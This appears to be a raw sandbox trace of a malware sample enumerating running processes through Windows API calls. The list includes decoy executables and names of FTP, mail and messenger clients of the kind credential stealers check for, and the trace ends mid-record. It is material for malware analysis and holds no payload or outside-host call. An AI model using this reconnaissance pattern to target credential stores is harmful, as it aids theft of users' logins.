lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0217.193] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0217.195] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0217.196] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0217.198] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0217.250] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0217.252] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0217.254] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0217.256] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0217.257] CloseHandle (hObject=0x1eb8) returned 1 [0217.257] Sleep (dwMilliseconds=0x64) [0217.281] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0217.330] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.333] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0217.335] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0217.336] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.338] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0217.340] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.341] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0217.343] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0217.345] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0217.346] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.348] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.349] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0217.351] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.352] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.354] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.356] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.358] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.359] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.361] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.362] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0217.364] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0217.402] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.405] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0217.407] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.409] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0217.410] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0217.412] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0217.413] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0217.415] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0217.416] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0217.418] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.420] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0217.421] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0217.422] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0217.424] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0217.425] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.427] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0217.429] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0217.431] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0217.432] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0217.434] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0217.435] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0217.437] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0217.467] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0217.468] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0217.470] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0217.472] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0217.473] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0217.475] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0217.476] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0217.478] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0217.479] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0217.481] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0217.482] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0217.484] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0217.486] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0217.487] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0217.488] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0217.490] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0217.492] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0217.494] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0217.497] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0217.499] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0217.501] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0217.530] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0217.532] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0217.534] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0217.536] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0217.538] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0217.540] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0217.542] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0217.544] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0217.546] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 